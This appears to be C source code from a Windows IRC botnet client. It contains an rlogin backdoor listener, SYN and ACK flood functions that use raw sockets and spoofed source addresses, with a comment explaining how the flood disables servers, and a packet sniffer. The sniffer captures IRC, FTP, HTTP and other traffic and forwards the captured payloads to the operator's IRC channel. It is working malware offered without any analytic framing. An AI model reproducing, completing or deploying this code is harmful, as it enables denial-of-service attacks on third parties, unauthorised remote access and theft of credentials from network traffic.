DWORD WINAPI RlogindThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
char sendbuf[IRCLINE];
int csin_len, Err;
unsigned long mode = 1;
WSADATA WSAData;
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD id;
if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) {
addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err);
clearthread(rlogind.threadnum);
ExitThread(1);
}
if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) {
addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError());
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(1);
}
SOCKET ssock, csock;
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(rlogind.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[rlogind.threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, SOMAXCONN) == 0) {
SecurityAttributes.nLength = sizeof(SecurityAttributes);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = FALSE;
addlog("[RLOGIND]: Ready and waiting for incoming connections.");
BOOL flag = TRUE;
while (1) {
csin_len = sizeof(csin);
if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)
break;
if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) {
rlogind.gotinfo = FALSE;
sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum);
addlog(sendbuf);
rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock);
threads[rlogind.cthreadnum].parent = rlogind.threadnum;
if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) {
while (rlogind.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError());
if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice);
addlog(sendbuf);
fclosesocket(csock);
fclosesocket(ssock);
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(0);
}
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=fhtons((unsigned short)TargetPort);
addr_in.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons((unsigned short)TargetPort);
tcpHeader.sport=fhtons((unsigned short)rand()%1025);
tcpHeader.seq=fhtonl(0x12345678);
/* A SYN attack simply smash its target up with TCP SYN packets.
Each SYN packet needs a SYN-ACK response and forces the server to wait for
the good ACK in reply. Of course, we just never gives the ACK, since we use a
bad IP address (spoof) there's no chance of an ACK returning.
This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs.
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs,
and that's the end of that server until the attack is cleared up.*/
if (strcmp(Type,"ddos.syn") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strcmp(Type,"ddos.ack") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strcmp(Type,"ddos.random") == 0) {
tcpHeader.ack_seq=rand()%3;
if (rand()%2 == 0)
tcpHeader.flags=SYN;
else
tcpHeader.flags=ACK;
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while(TRUE) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;
SOCKET sock;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(TargetPort);
ssin.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons(TargetPort);
tcpHeader.ack_seq=0;
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.flags=2;
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while (1) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
DWORD WINAPI SnifferThread(LPVOID param) {
SNIFFER sniff = *((SNIFFER *)param);
SNIFFER *sniffs = (SNIFFER *)param;
sniffs->gotinfo = TRUE;
char sendbuf[IRCLINE];
int sock; sockaddr_in addr_in; hostent *hEnt;
IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket;
char szName[255]={0}; unsigned long lLocalIp;
addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
addr_in.sin_addr.s_addr=lLocalIp;
sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(sock==INVALID_SOCKET) return NULL;
if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
int optval=1; DWORD dwBytesRet;
if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
{
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;
while(1)
{
// Clear the buffer
memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;
// Read the raw packet
iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
// Process if its a TCP/IP packet
if(ipHeader->proto==6)
{ tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
if(iSrcPort !=110 && iSrcPort!=25 &&
iDestPort !=110 && iDestPort!=25)
{
sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
for(int i=0; i<(int)strlen(szPacket); i++) {
if(szPacket[i]=='\r') szPacket[i]='\x20';
if(szPacket[i]=='\n') szPacket[i]='\x20'; }
if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousHTTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousVULN(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
}
}
}
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
return 0;
}
